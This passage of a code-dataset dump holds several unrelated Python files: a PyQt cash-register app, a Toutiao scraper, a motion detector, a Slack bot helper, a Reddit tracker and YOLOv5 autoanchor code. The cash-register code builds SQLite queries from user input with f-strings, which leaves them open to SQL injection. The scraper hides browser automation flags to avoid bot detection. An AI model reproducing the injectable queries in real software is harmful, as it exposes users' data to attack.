enviar_banco_gestao():\r\n        global lista_compra\r\n        caixa = ui.lb_caixa.text()\r\n        banco = sqlite3.connect('banco_dados.db')\r\n        data = str(data_agora())\r\n        cursor = banco.cursor()\r\n        for x in range(0,len(lista_compra)//2):\r\n            print(lista_compra)\r\n            print(x)\r\n            codigo = lista_compra[2*x]\r\n            quantidade = lista_compra[2*x+1]\r\n            cursor.execute(f\"INSERT INTO gestao values (NULL,'{caixa}','{codigo}','{quantidade}','{data}')\")\r\n            banco.commit()\r\n        banco.close()\r\n        lista_compra.clear()\r\n\r\n    def definir_troco():\r\n        total_compra = float(ui.txt_preco.text())\r\n        dinheiro_recebido = float(ui.txt_dinheiro_recebido.text())\r\n        troco = dinheiro_recebido - total_compra\r\n        ui.txt_troco.setText(f'{troco:.2f}')\r\n\r\n    def definir_preco_total(preco,quantidade,opcao=0):\r\n        if opcao == 1:\r\n            pass\r\n        else:\r\n            preco = float(preco)\r\n            quantidade = int(quantidade)\r\n            valor_adicionar = preco * quantidade\r\n            valor_atual = ui.txt_preco.text()\r\n            if len(valor_atual) == 0:\r\n                valor_atual = 0\r\n            else:\r\n                valor_atual = float(valor_atual)\r\n            calculo = valor_atual+valor_adicionar\r\n            ui.txt_preco.setText(f'{calculo:.2f}')\r\n\r\n    def procurar():\r\n        global codigo,produto,preco\r\n        try:\r\n            pesquisar = str(ui.txt_codigo.text()).strip()\r\n            if len(pesquisar) != 0:\r\n                if len(str(pesquisar)) < 6:\r\n                    pesquisar = ('0' * (6 - len(str(pesquisar)))) + str(pesquisar)\r\n\r\n                banco = sqlite3.connect('banco_dados.db')\r\n                cursor = banco.cursor()\r\n                cursor.execute(f\"\"\"SELECT codigo,produto,preco from produtos WHERE codigo == '{pesquisar}'\"\"\")\r\n                produtos = cursor.fetchall()\r\n                if len(produtos) != 0:\r\n                    produtos = produtos[0]\r\n                    banco.commit()\r\n                    codigo = produtos[0]\r\n                    produto = produtos[1]\r\n                    preco = produtos[2]\r\n                    ui.txt_codigo_produto.setText(f'{codigo}')\r\n                    ui.txt_produto.setText(f'{produto}')\r\n                    ui.txt_preco_unitario.setText(f'{preco}')\r\n                    banco.close()\r\n                else:\r\n                    mostrar_msg('Caixa EMPRESA XYZ','Digite o codigo do produto')\r\n            else:\r\n                mostrar_msg('Caixa EMPRESA XYZ','Digite o codigo do produto')\r\n        except ValueError as erro:\r\n            mostrar_msg('Caixa EMPRESA XYZ',f'Erro nome: {erro}')\r\n        ui.txt_troco.setText('')\r\n\r\n    def adicionar_linha_nota(codigo_produto,produto,quantidade,preco):\r\n        ui.txt_nota.append(f'{codigo_produto:0<6} {\"\":-<4} {produto: <10} {\"\":-<4} {quantidade:0>3} {\"-\" * 4} {preco: >5}')\r\n\r\n    def adicionar_nota():\r\n        #\r\n        # VERSÃO 00\r\n        # if len(pesquisar) != 0:\r\n        #     for x in range(1, (len(produtos) // 4) + 1):\r\n        #         if len(str(x)) < 6:\r\n        #             pesquisar = 
('0' * (6 - len(str(x)))) + str(x)\r\n # codigo_indice = produtos.index(f'{pesquisar}')\r\n # codigo = produtos[codigo_indice]\r\n # produto = produtos[codigo_indice + 1]\r\n # quantidade = produtos[codigo_indice + 2]\r\n # preco = produtos[codigo_indice + 3]\r\n # adicionar_linha_nota(codigo,produto,quantidade,preco)\r\n global codigo, produto, preco, lista_nota, lista_compra\r\n quantidade = str(ui.txt_quantidade.text()).strip()\r\n try:\r\n print(lista_compra)\r\n except:\r\n lista_compra = []\r\n if len(ui.txt_codigo_produto.text()) != 0:\r\n try:\r\n lista_compra.append(f'{codigo}')\r\n lista_compra.append(f'{quantidade}')\r\n print(lista_compra)\r\n adicionar_linha_nota(codigo,produto,quantidade,preco)\r\n definir_preco_total(preco,quantidade)\r\n except ValueError as erro:\r\n mostrar_msg('Caixa EMPRESA XYZ',f'Erro nome: {erro}')\r\n else:\r\n mostrar_msg('Caixa EMPRESA XYZ','Digite um produto antes de inserir')\r\n\r\n def limpar_campos():\r\n ui.txt_preco.clear()\r\n ui.txt_codigo_produto.clear()\r\n ui.txt_produto.clear()\r\n ui.txt_preco_unitario.clear()\r\n ui.txt_quantidade.clear()\r\n ui.txt_codigo.clear()\r\n ui.txt_remover_produto.clear()\r\n ui.txt_dinheiro_recebido.clear()\r\n ui.txt_nota.clear()\r\n\r\n def enviar_dados():\r\n if ui.rd_dinheiro.isChecked():\r\n definir_troco()\r\n dinheiro_recebido = float(ui.txt_dinheiro_recebido.text())\r\n troco = float(ui.txt_troco.text())\r\n else:\r\n dinheiro_recebido = 0\r\n troco = 0\r\n valor_total = float(ui.txt_preco.text())\r\n nota = ui.txt_nota.toPlainText()\r\n ui.txt_nota.clear()\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('/' * 54)\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('CODIGO ---- NOME PRODU ---- QTD ---- PRECO')\r\n ui.txt_nota.append(nota)\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('-'*54)\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append(f'Total: {valor_total:<5.2f} ---- Dinheiro: {dinheiro_recebido:<5.2f} ')\r\n ui.txt_nota.append(f'Metodo de Pagamento: {definir_metodo_pagamento()}')\r\n ui.txt_nota.append(f'Troco: {troco:<5.2f}')\r\n ui.txt_nota.append(f'Data e hora: {data_agora()}')\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('/'*54)\r\n\r\n\r\n\r\n def verificar_campos():\r\n botao_cartao = ui.rd_cartao.isChecked()\r\n botao_dinheiro = ui.rd_dinheiro.isChecked()\r\n valor_retorno = 1\r\n if len(ui.txt_nota.toPlainText()) == 0:\r\n mostrar_msg('CAIXA EMPRESA XYZ','Entre ao Menos Um Item')\r\n valor_retorno = 0\r\n if botao_cartao == False and botao_dinheiro == False:\r\n mostrar_msg('CAIXA EMPRESA XYZ','Selecione o Tipo de Pagamento')\r\n valor_retorno = 0\r\n elif ui.rd_dinheiro.isChecked() == True and len(ui.txt_dinheiro_recebido.text()) == 0:\r\n mostrar_msg('CAIXA EMPRESA XYZ','Digite o Valor Recebido')\r\n valor_retorno = 0\r\n if len(ui.txt_dinheiro_recebido.text()) != 0 and len(ui.txt_preco.text()) != 0:\r\n recebido = float(ui.txt_dinheiro_recebido.text())\r\n total = float(ui.txt_preco.text())\r\n troco = recebido - total\r\n if troco < 0:\r\n mostrar_msg('CAIXA EMPRESA XYZ', 'O valor Recebido Não pode ser menor que o Valor total')\r\n valor_retorno = 0\r\n return valor_retorno\r\n\r\n\r\n\r\n def finalizar_compra():\r\n verificar = verificar_campos()\r\n if verificar == 1:\r\n # print('a')\r\n enviar_dados()\r\n enviar_banco_notas()\r\n enviar_banco_gestao()\r\n limpar_campos()\r\n\r\n lista_compra = ['1']\r\n ui.lb_caixa.setText('01')\r\n ui.btn_adicionar_produto.clicked.connect(adicionar_nota)\r\n ui.btn_procurar.clicked.connect(procurar)\r\n 
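# finalizar_compra validates the inputs, renders the receipt and persists the sale\r\n    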
ui.btn_finalizar_compra.clicked.connect(finalizar_compra)\r\n ui.rd_cartao.clicked.connect(lambda: ui.txt_dinheiro_recebido.setText(''))\r\n\r\n# Mascaras de campos de texto\r\n\r\n # ui.txt_codigo.setValidator(QDoubleValidator(0, 0, 3))\r\n ui.txt_codigo.setInputMask(\"0000\")\r\n ui.txt_quantidade.setInputMask(\"000\")\r\n\r\n# Mascaras de campos de texto\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n main(ui)\r\n sys.exit(app.exec_())","repo_name":"kilerhg/Python-Studies","sub_path":"SQLite/Projetos/Caixa_Supermercado/janela.py","file_name":"janela.py","file_ext":"py","file_size_in_byte":10402,"program_lang":"python","lang":"pt","doc_type":"code","stars":64,"dataset":"github-code","pt":"77"} +{"seq_id":"15497710667","text":"import requests\nfrom urllib.parse import urlencode, unquote, urljoin\nfrom fake_useragent import UserAgent\nimport parsel\nimport csv\nimport logging\nfrom queue import Queue\nfrom threading import Thread\nfrom concurrent.futures import ThreadPoolExecutor\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s: %(message)s')\n\n\nclass TouTiao:\n def __init__(self, keyword, filename='头条新闻.csv'):\n self.fileObj = open(filename, 'w', encoding='utf8')\n self.writer = csv.writer(self.fileObj)\n self.params = {\n 'dvpf': 'pc',\n 'page_num': '0',\n 'keyword': keyword,\n 'pd': 'information',\n 'source': 'input',\n }\n self.search_url = 'https://so.toutiao.com/search'\n self.base_url = 'https://so.toutiao.com/'\n self.browser = self.get_broswer()\n self.detail_urls = []\n self.page_urls = []\n\n @staticmethod\n def get_proxy():\n return requests.get(\"http://127.0.0.1:5010/get/\").json()\n\n def get_broswer(self) -> webdriver:\n options = webdriver.ChromeOptions()\n # 处理证书错误\n options.add_argument('--ignore-certificate-errors')\n # 修改windows.navigator.webdriver,防机器人识别机制,selenium自动登陆判别机制\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n options.add_argument(\"--disable-blink-features=AutomationControlled\")\n # 添加代理\n # proxy = TouTiao.get_proxy().get(\"proxy\")\n # options.add_argument('--proxy-server=http://' + proxy)\n browser = webdriver.Chrome(options=options)\n return browser\n\n def request_start_page_url(self):\n useragent = UserAgent().random\n headers = {\n 'User-Agent': useragent,\n 'Referer': 'https://so.toutiao.com/',\n }\n r = requests.get(self.search_url, params=self.params, headers=headers)\n html = r.text\n self.parse_links(html, self.search_url, useragent, r.cookies)\n\n def request_page_url(self):\n print(f\"此时page_urls的大小为:{len(self.page_urls)}\")\n while len(self.page_urls) != 0:\n page_url, referer = self.page_urls.pop()\n useragent = UserAgent().random\n headers = {\n 'User-Agent': useragent,\n 'Referer': referer,\n }\n logging.info(f'正在请求: {page_url}')\n r = requests.get(page_url, headers=headers)\n self.parse_links(r.text, page_url, useragent, r.cookies)\n\n\n def parse_links(self, html, referer, useragent, cookies):\n sel = parsel.Selector(html)\n hrefs = sel.css('.text-xl>a::attr(href)').re(r'url=(.*)') # 注意该url已被加密\n print(\"文章链接: \", [unquote(href) for href in hrefs])\n\n for href in hrefs:\n item = 
(unquote(href), referer, useragent, cookies)\n logging.info('添加detail_urls中: (%s, %s, %s, %s)' % item)\n self.detail_urls.append(item)\n\n # 获取下一页的url,次url从/search开始\n next_page = sel.xpath('//a[contains(.,\"下一页\")]/@href').get()\n # 下一页的链接\n print('下一页的链接', next_page)\n if next_page:\n item2 = (urljoin(self.base_url, next_page), referer)\n logging.info('添加page_urls中: (%s, %s)' % item2)\n self.page_urls.append(item2)\n\n def request_article_url(self):\n print(f\"此时detail_urls的大小为:{len(self.detail_urls)}\")\n while len(self.detail_urls) != 0:\n detail_url, referer, useragent, cookies = self.detail_urls.pop()\n # headers['Referer'] = referer\n # headers['User-Agent'] = useragent\n # logging.info(f'请求文章{detail_url}')\n # r = requests.get(detail_url, headers=headers, cookies=cookies)\n # parse_article(r.text)\n\n # 利用selenium抓取\n logging.info(f'请求文章{detail_url}')\n self.browser.get(detail_url)\n wait = WebDriverWait(self.browser, 5)\n try:\n wait.until(EC.presence_of_element_located((By.XPATH, '//article')))\n html = self.browser.page_source\n # if 'error' in html:\n # self.put_back(detail_url, referer, useragent, cookies)\n # continue\n item = (detail_url, referer, useragent, cookies)\n self.parse_article(html, item)\n except TimeoutException as e:\n logging.error(e)\n self.put_back(detail_url, referer, useragent, cookies)\n\n\n def parse_article(self, html, item):\n sel = parsel.Selector(html)\n title = sel.css('h1::text').get()\n article = sel.xpath('//article//text()').extract()\n if not title or not article:\n return self.put_back(*item)\n article = ''.join(article)\n\n row = [title, article]\n print(f'保存当清数据{row}')\n self.writer.writerow(row)\n\n def put_back(self, detail_url, referer, useragent, cookies):\n self.browser.close()\n self.browser = self.get_broswer()\n # 放回原队列\n self.detail_urls.insert(0, (detail_url, referer, useragent, cookies))\n\n def start(self):\n self.request_start_page_url()\n # while len(self.page_urls) != 0:\n # self.request_page_url()\n # while len(self.detail_urls) != 0:\n # self.request_article_url()\n self.request_article_url()\n\n\n def __del__(self):\n self.fileObj.close()\n self.browser.close()\n\n\nif __name__ == '__main__':\n toutiao = TouTiao('208万日薪')\n toutiao.start()\n","repo_name":"Bruceey/PythonSpider","sub_path":"touTiao/toutiao_final.py","file_name":"toutiao_final.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"313392415","text":"import cv2, time, pandas\nfrom datetime import datetime\n\n# web cam\nvideo = cv2.VideoCapture(0)\nvideo.read()\ntime.sleep(1.0)\n\n# first frame\nfirst_frame = None\ncount = 0\nstatus_list = [0,0]\ntimes = []\ndf = pandas.DataFrame(columns=[\"Start\",\"End\"])\n\nwhile True:\n check, frame = video.read()\n status = 0\n\n gray_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n gray_frame = cv2.GaussianBlur(gray_frame,(21,21),0)\n\n ###\n ########## detect motion\n ###\n\n # get first frame\n if first_frame is None:\n first_frame = gray_frame\n continue\n\n # difference of frame\n diff_frame = cv2.absdiff(first_frame,gray_frame)\n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations=2)\n\n # find contours\n (cnts,_) = cv2.findContours(thresh_frame.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in cnts:\n if cv2.contourArea(contour) < 50000 :\n continue\n status = 1\n (x,y,w,h) = cv2.boundingRect(contour)\n 
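# outline the detected motion region with a green box on the displayed frame\n        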
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),6)\n\n status_list = status_list[-2:]\n status_list.append(status)\n if status_list[-1] == 1 and status_list[-2] == 0:\n times.append(datetime.now())\n if status_list[-1] == 0 and status_list[-2] == 1:\n times.append(datetime.now())\n\n cv2.imshow(\"Capturing\",gray_frame)\n cv2.imshow(\"Delta\",diff_frame)\n cv2.imshow(\"THRES\",thresh_frame)\n cv2.imshow(\"Countour\",frame)\n\n key = cv2.waitKey(1)\n\n if key == ord('q'):\n if status == 1:\n times.append(datetime.now())\n break\n \n\nfor i in range(0,len(times),2):\n df = df.append({\"Start\":times[i],\n \"End\":times[i+1]},ignore_index=True)\n\ndf.to_csv(\"Times.csv\")\nvideo.release()\ncv2.destroyAllWindows()","repo_name":"achhetr/Front-face-detection","sub_path":"motion_detection.py","file_name":"motion_detection.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32349500874","text":"\ndef remove_duplicates(arg):\n arga=arg\n arga.sort()\n list_sorted=[arga[0]]\n for i in arga:\n if list_sorted[-1]!=i:\n list_sorted.append(i)\n return list_sorted\n\n\ndef remove_duplicates2(arg):\n arga=arg\n list_sorted=[]\n for i in arg:\n if i not in list_sorted:\n list_sorted.append(i)\n return list_sorted\n\ndef remove_duplicates3(arg):\n return list(set(arg))\n\nif __name__ == '__main__':\n import timeit\n\n a=[4,5,6,2,3,1,2,7,8,2]*1000\n print(\"My def: \",timeit.timeit(\"remove_duplicates(a)\", setup=\"from __main__ import remove_duplicates,a\"))\n print(\"if not in: \",timeit.timeit(\"remove_duplicates2(a)\", setup=\"from __main__ import remove_duplicates2,a\"))\n print(\"Set: \",timeit.timeit(\"remove_duplicates3(a)\", setup=\"from __main__ import remove_duplicates3,a\"))\n","repo_name":"dzaczek/learning_py","sub_path":"duplicator.py","file_name":"duplicator.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42711986171","text":"from typing import Dict, List\n\nfrom slack.methods import Methods\nfrom functools import lru_cache\nfrom flask import url_for, current_app\nimport requests\nfrom werkzeug.local import LocalProxy\n\nfrom pyback import slack_client as slack\n\nAPP_TOKEN = LocalProxy(lambda: current_app.config['APP_TOKEN'])\nlogger = LocalProxy(lambda: current_app.logger)\n\n\nclass Message:\n def __init__(self, ts, channel, text):\n self.ts = ts\n self.channel = channel\n self.text = text\n\n @property\n def channel_name(self) -> str:\n return Message.get_channel_name(self.channel)\n\n @property\n def delete_url(self) -> str:\n return url_for('web.delete_message', ts=self.ts, channel=self.channel)\n\n @classmethod\n @lru_cache(64)\n def get_channel_name(cls, channel: str) -> str:\n response = slack.api_call(Methods.CONVERSATIONS_INFO, channel=channel)\n if response['ok']:\n channel = response['channel']\n if 'name' in channel:\n return response['channel']['name']\n elif channel['is_im']:\n return slack.user_name_from_id(channel['user'])\n else:\n return channel\n else:\n return channel\n\n def serialize(self) -> Dict[str, str]:\n return {\n 'ts': self.ts,\n 'channel': self.channel,\n 'text': self.text,\n 'delete_url': self.delete_url,\n }\n\n\ndef get_messages() -> List[Dict[str, str]]:\n bot_name = slack.bot_name\n\n data = {\n 'token': str(APP_TOKEN),\n 'query': f'from:{bot_name}',\n 'count': 100,\n 'sort': 'timestamp'\n }\n json_response = _call_slack_api(data)\n matches = 
json_response['messages']['matches']\n messages = [Message(match['ts'], match['channel']['id'], match['text']).serialize() for match in matches]\n return messages\n\n\ndef _call_slack_api(data):\n res = requests.post('https://slack.com/api/search.messages', data=data)\n logger.debug(f'API call method: search.messages || Result: {res.status_code}')\n res.raise_for_status()\n\n return res.json()\n\n\ndef delete(ts: str, channel: str):\n return slack.delete_message(ts, channel)\n","repo_name":"AllenAnthes/pyback-rewrite","sub_path":"pyback/web/bot_message_handlers.py","file_name":"bot_message_handlers.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74224144569","text":"from os import environ\nfrom pprint import pprint\n\nfrom flask import Flask\n\nclass BaseConfig:\n REDIS_HOST = \"redis.ephemeral-development\"\n FLASK_ENV=\"development\"\n\nclass Local:\n REDIS_HOST = \"redis\"\n\nclass ECS:\n pass\n\ndef get_configuration(docker):\n \"\"\"Helper function to retrieve configuration based on environment cross product.\"\"\"\n dockerenvs = dict(local=Local, ecs=ECS)\n dockerenv_config = dockerenvs[docker]\n\n config = {\n **BaseConfig.__dict__,\n **dockerenv_config.__dict__,\n }\n config[\"DOCKER\"] = docker\n pprint(config, indent=4)\n return config\n\n\ndef configure(app: Flask):\n \"\"\"Setup environment based on the app.\n\n Args:\n app (Flask): current Flask application.\n \"\"\"\n app.config[\"ENV\"] = app.config[\"FLASK_ENV\"]\n environ[\"FLASK_ENV\"] = app.config[\"FLASK_ENV\"]\n\n\n","repo_name":"dakobedbard/Darujistan","sub_path":"darujistan-api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37586981918","text":"import praw\nimport sys\nimport time\nimport traceback\n\nUSERAGENT = \"\"\nAPP_ID = \"\"\nAPP_SECRET = \"\"\nAPP_URI = \"\"\nAPP_REFRESH = \"\"\n# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/\n\ntry:\n import bot\n USERAGENT = bot.aG\n APP_ID = bot.oG_id\n APP_SECRET = bot.oG_secret\n APP_URI = bot.oG_uri\n APP_REFRESH = bot.oG_scopes['all']\nexcept ImportError:\n pass\n\nprint('logging in')\nr = praw.Reddit(USERAGENT)\nr.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)\nr.refresh_access_information(APP_REFRESH)\n\ndef submissionscoretracker(submissionid):\n if '_' not in submissionid:\n submissionid = 't3_' + submissionid\n submission = r.get_info(thing_id=submissionid)\n \n outfile = open(submission.fullname + '.txt', 'a+')\n last_refresh = time.time()\n while True:\n try:\n if time.time() - last_refresh:\n r.refresh_access_information()\n last_refresh = time.time()\n submission.refresh()\n print('%s, %d' % (time.strftime('%H:%M:%S'), submission.score))\n outfile.write('%d, %d\\n' % (int(time.time()), submission.score))\n outfile.flush()\n except KeyboardInterrupt:\n outfile.close()\n return\n except:\n traceback.print_exc()\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n submissionid = input('id: ')\n else:\n submissionid = sys.argv[1]\n submissionscoretracker(submissionid)","repo_name":"voussoir/reddit","sub_path":"_old/SubmissionScoreTracker/submissionscoretracker.py","file_name":"submissionscoretracker.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":478,"dataset":"github-code","pt":"77"} 
+{"seq_id":"43357042752","text":"#!/usr/bin/python\n\"\"\"\nXuenan Pi\n29-9-2015\nScript to detect reference insertions\n\"\"\"\n\nfrom sys import argv\nfrom functions import read_file_1\nimport os.path\nimport os\nimport subprocess\n\ndef extract_reads(infile_name,te_name,mq=30):\n \"\"\"use samtool to extract reads mapped around the end of the transposon \n sequence\n \"\"\" \n outfile = None\n if os.path.isfile(infile_name):\n cmd_f = \"samtools view -F 16 %s | awk '$3!=\\\"%s\\\" && $7!=\\\"=\\\" && \\\n $5 >= %d'\" % (infile_name,te_name,mq)\n p_f = subprocess.Popen([cmd_f],shell=True,stdout=subprocess.PIPE,\\\n stderr=subprocess.PIPE)\n forward,err = p_f.communicate()\n cmd_r = \"samtools view -f 16 %s | awk '$3!=\\\"%s\\\" && $7!=\\\"=\\\" && \\\n $5 >= %d'\" % (infile_name,te_name,mq)\n p_r = subprocess.Popen([cmd_r],shell=True,stdout=subprocess.PIPE,\\\n stderr=subprocess.PIPE)\n reverse,err = p_r.communicate()\n return forward,reverse\n\ndef group(chr_prefix,infile,insert_size,read_length,flag):\n \"\"\"put all supportive reads in a group\"\"\"\n final_result = []\n fileline = infile.strip().split('\\n')\n p_list = [[0,0,0,0]] \n i = 0\n while i < len(fileline):\n line = fileline[i].strip().split('\\t')[:10]\n if flag:\n line += ['-']\n else:\n line += ['+']\n if chr_prefix in line[2]:\n result = check_line(p_list,line,insert_size,read_length)\n if result[0]:\n p_list += [result[1:]]\n i += 1\n else:\n if not i+1 == len(fileline):\n final_result += [p_list]\n p_list = [result[1:]]\n i += 1\n else:#only for the last read\n final_result += [p_list]\n p_list = [result[1:]]\n i += 1\n else:\n i += 1\n pass\n return final_result\n\ndef check_line(p_list,line,insert_size,read_length):\n \"\"\"check if the reads belong to the group\"\"\"\n line_list = line[:]\n chr = line_list[2]\n loci1 = int(line_list[3])#start of alignment\n if chr == p_list[0][0] and abs(loci1-p_list[0][1]) <= insert_size:\n return True,chr,loci1,len(line[-2]),line[-1]\n else:\n return False,chr,loci1,len(line[-2]),line[-1]\n\n\ndef info(raw_list,read_length):\n \"\"\"\"generate the start and end location for each group. 
Like chr start \n end num_sr length: SL2.40ch00 1200 1300 10 100.\"\"\"\n for i in raw_list:\n if len(i) >= 3:#filter out sr<=3 \n chr = i[0][0]\n if i[0][-1]=='-':#left alignment\n end = i[-1][1]+read_length\n leftsr = len(i)\n yield [chr,end,leftsr,\"left\"]\n else:\n start = i[0][1]\n rightsr = len(i)\n yield [chr,start,rightsr,\"right\"]\n\ndef write_file(result_list,homo_dict,gap_dict,distan,outfile_copy,outfile_gap):\n \"\"\"confirm the group of face each other reads are matched with blast result\n \"\"\"\n i = 0\n out_gap = open(outfile_gap,'w+')\n out_copy = open(outfile_copy,'w+')\n while i[6301, 1, 2]\n # 所有anchor的wh k[None] [9, 2]->[1, 9, 2]\n # r: target的高h宽w与anchor的高h_a宽w_a的比值,即h/h_a, w/w_a [6301, 9, 2] 有可能大于1,也可能小于等于1\n r = wh[:, None] / k[None]\n # x 高宽比和宽高比的最小值 无论r大于1,还是小于等于1最后统一结果都要小于1 [6301, 9]\n x = torch.min(r, 1 / r).min(2)[0] # ratio metric\n # best [6301] 为每个gt框选择匹配所有anchors宽高比例值最好的那一个比值\n best = x.max(1)[0] # best_x\n # aat(anchors above threshold) 每个target平均有多少个anchors\n aat = (x > 1 / thr).float().sum(1).mean() # # 当axis=1时,求的是每一行元素的和\n # bpr(best possible recall) = 最多能被召回(通过thr)的gt框数量 / 所有gt框数量 小于0.98 才会用k-means计算anchor\n bpr = (best > 1 / thr).float().mean() # best possible recall\n return bpr, aat\n\n stride = m.stride.to(m.anchors.device).view(-1, 1, 1) # model strides\n # anchors: [N,2] 所有anchors的宽高 基于缩放后的图片大小(较长边为640 较小边相应缩放)\n anchors = m.anchors.clone() * stride # current anchors\n # 计算出数据集所有图片的wh和当前所有anchors的bpr和aat\n # bpr: bpr(best possible recall): 最多能被召回(通过thr)的gt框数量 / 所有gt框数量 [1] 0.96223 小于0.98 才会用k-means计算anchor\n # aat(anchors past thr): [1] 3.54360 通过阈值的anchor个数\n bpr, aat = metric(anchors.cpu().view(-1, 2))\n s = f'\\n{PREFIX}{aat:.2f} anchors/target, {bpr:.3f} Best Possible Recall (BPR). '\n # todo 之前是< ? 
Given the gap between the w/h of these 9 anchors and the w/h of the gt boxes, if bpr < 0.98 (meaning the current anchors do not fit the dataset's gt boxes well) new anchors are re-clustered with the k-means algorithm\n if bpr > 0.98: # threshold to recompute\n LOGGER.info(f'{s}Current anchors are a good fit to dataset ✅')\n else:\n LOGGER.info(f'{s}Anchors are a poor fit to dataset ⚠️, attempting to improve...')\n na = m.anchors.numel() // 2 # number of anchors\n\n # if bpr < 0.98 (max is 1, higher is better) use k-means + genetic evolution to select anchors that better match the dataset [9, 2]\n anchors = kmean_anchors(dataset, n=na, img_size=imgsz, thr=thr, gen=1000, verbose=False)\n\n # compute new_bpr of the new anchors\n new_bpr = metric(anchors)[0]\n # compare new_bpr of the anchors evolved by k-means + the genetic algorithm with the bpr of the original anchors\n # note: the evolved bpr is not necessarily larger than the original anchors' bpr, because the two are measured differently: the evolutionary algorithm is scored by fitness, while here we compare bpr\n if new_bpr > bpr: # replace anchors\n anchors = torch.tensor(anchors, device=m.anchors.device).type_as(m.anchors)\n # replace m's anchors (relative to each feature map) [9, 2] -> [3, 3, 2]\n m.anchors[:] = anchors.clone().view_as(m.anchors)\n # check that the anchor order matches the stride order and adjust if not\n # our m.anchors are relative to each feature map, so the order must match, otherwise results will be much worse\n check_anchor_order(m) # must be in pixel-space (not grid-space)\n m.anchors /= stride\n s = f'{PREFIX}Done ✅ (optional: update model *.yaml to use these anchors in the future)'\n else:\n s = f'{PREFIX}Done ⚠️ (original anchors better than new anchors, proceeding with original anchors)'\n LOGGER.info(s)\n\n\ndef kmean_anchors(dataset='./data/coco128.yaml', n=9, img_size=640, thr=4.0, gen=1000, verbose=True):\n \"\"\"called from check_anchors\n uses K-means + a genetic algorithm to compute anchors that better fit the current dataset\n Creates kmeans-evolved anchors from training dataset\n :params path: path to the dataset / the dataset itself\n :params n: number of anchor boxes\n :params img_size: the agreed image size of the dataset\n :params thr: threshold, controlled by the hyp['anchor_t'] parameter\n :params gen: number of genetic-evolution iterations (mutation + selection)\n :params verbose: whether to print every (successful) evolution result; defaults to False, printing only the best result\n :return k: the anchors after k-means + genetic evolution\n\t\"\"\"\n from scipy.cluster.vq import kmeans\n\n npr = np.random\n # note that the thr below is not the thr passed in but 1/thr, so metric computation still matches check_anchor\n thr = 1 / thr\n\n def metric(k, wh): # compute metrics\n \"\"\"used by print_results and anchor_fitness\n computes the ratio metric: width and height ratios between the dataset's gt boxes and the anchors, i.e. gt_w/k_w, gt_h/k_h + x + best_x, used later to compute bpr+aat\n note the metric chosen here is the w/h ratio between gt box and anchor rather than the usual iou; this also matches the nms filtering condition and is the new approach used in yolov5\n :params k: anchor boxes\n :params wh: wh of the whole dataset [N, 2]\n :return x: [N, 9] width or height ratio (the smaller of the two) of the N gt boxes against all anchors\n :return x.max(1)[0]: [N] the largest of those ratios (smaller of the two) for each of the N gt boxes over all anchors\n \"\"\"\n # [N, 1, 2] / [1, 9, 2] = [N, 9, 2] width and height ratios of N gt_wh against the 9 anchor k_wh\n # the higher the overlap the closer to 1; away from 1 (<1 or >1) the overlap is lower\n r = wh[:, None] / k[None]\n # r=gt_height/anchor_height gt_width / anchor_width, may be greater than 1 or less than or equal to 1\n # torch.min(r, 1. 
/ r): [N, 9, 2] unify all width and height ratios to <=1\n # .min(2): value=[N, 9] the smallest width/height ratio of each gt and anchor, index: [N, 9] whether that minimum is the width ratio (0) or the height ratio (1)\n # [0] returns value [N, 9], the smallest width/height ratio of each gt and anchor, i.e. the lowest overlap between every gt and anchor\n x = torch.min(r, 1 / r).min(2)[0] # ratio metric\n # x = wh_iou(wh, torch.tensor(k)) # iou metric\n # x.max(1)[0]: [N] returns the largest width/height ratio of each gt over all (9) anchors\n return x, x.max(1)[0] # x, best_x\n\n def anchor_fitness(k): # mutation fitness\n \"\"\"used by kmean_anchors\n fitness computation, survival of the fittest; the criterion the genetic algorithm uses to judge whether a mutation helped: if it did, selection happens, otherwise the next round of mutation continues\n :params k: [9, 2] the 9 anchors produced by k-means wh: [N, 2]: w/h of all gt boxes in the dataset\n :return (best * (best > thr).float()).mean()=the fitness formula [1]; note this differs from bpr, it is a custom fitness formula\n returns the fitness of the anchor k passed in\n \"\"\"\n _, best = metric(torch.tensor(k, dtype=torch.float32), wh)\n return (best * (best > thr).float()).mean() # fitness\n\n def print_results(k, verbose=True):\n \"\"\"prints k-means related information inside kmean_anchors\n computes bpr and aat => prints: threshold+bpr+aat, anchor count+image size+metric_all+best_mean+past_mean+the anchors clustered by k-means (rounded)\n :params k: the anchor k obtained from k-means\n :return k: input\n 